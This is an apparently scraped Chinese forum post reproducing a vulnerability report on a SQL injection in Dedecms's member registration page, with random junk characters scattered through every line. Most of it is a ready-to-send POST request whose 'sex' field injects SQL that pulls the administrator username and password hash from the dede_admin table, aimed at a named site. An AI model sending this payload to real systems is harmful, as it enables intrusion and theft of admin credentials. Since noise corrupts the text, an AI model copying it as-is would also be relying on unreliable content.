漏洞类型: SQL注射漏洞
* w% L: | e1 ^) p, W# E2 r简要描述:
7 p6 x+ Y, ~% i$ a. G
6 h9 D* b8 P; g: i+ T% C5 P需要magic_quotes_gpc=Off,应该是没有什么大危害的漏洞.
9 [: T [& ]; E O1 O7 C' ?原来在wooyun发过一个Dedecms注射漏洞,貌似并没有修补,重新利用了一下,可以获得管理员密码.+ X( Z0 Y- ~" A$ j/ X1 d
详细说明:跟这个漏洞
+ z( w; |1 ]# S( i$ W* E
5 h/ A7 T' W0 yWooYun: Dedecms SQL注射导致审核机制绕过漏洞
5 N. P! W. Y) W是一个漏洞.其实不仅仅是审核机制绕过,可以获得管理员密码的.
4 V' j' F! e$ MPOST提交以下数据,其实不用POST提交的,这样隐蔽点.6 t. r2 J. L) I8 h+ Y d( ^( _- \
8 E9 x% v1 {( _4 {- Q- b- V# j
www.political-security.com/member/reg_new.php/ n% q1 I4 J; `8 c! @' p# a% |
3 L- ?. h+ u- \POST
, S, y3 c4 l( L$ T& ^; Y" I& J0 n/ y/ q + J) C3 v) Y2 a& w, @, G# q. Z- G9 R
dopost=regbase&step=1&mtype=%E4%B8%AA%E4%BA%BA&mtype=%E4%B8%AA%E4%BA%BA&9 o% S/ ~( c$ a5 e( B( o! i/ u
userid=c4rp3nt3r&uname=c4rp3nt3r7 _5 F9 P7 y5 q& X+ K6 M
&userpwd=ssssss&userpwdok=ssssss&email=sss%40ss.ss9 @) _1 o1 h. l, j }3 s
&safequestion=0&safeanswer=&sex=boy',100,100,'sss@xx.xx',1000,0,'www' and @`'`,4 A g9 z' c5 V( t5 d2 t/ }) [, O# P
(select concat(userid,0x3a,pwd) from `dede_admin` limit 1),0,'',1316751900,'',1316751900,'');8 q( A W5 L8 M- | Z
%00&vdcode=glos&agree= |
发表于 2013-1-19 08:25:02
收藏
支持
反对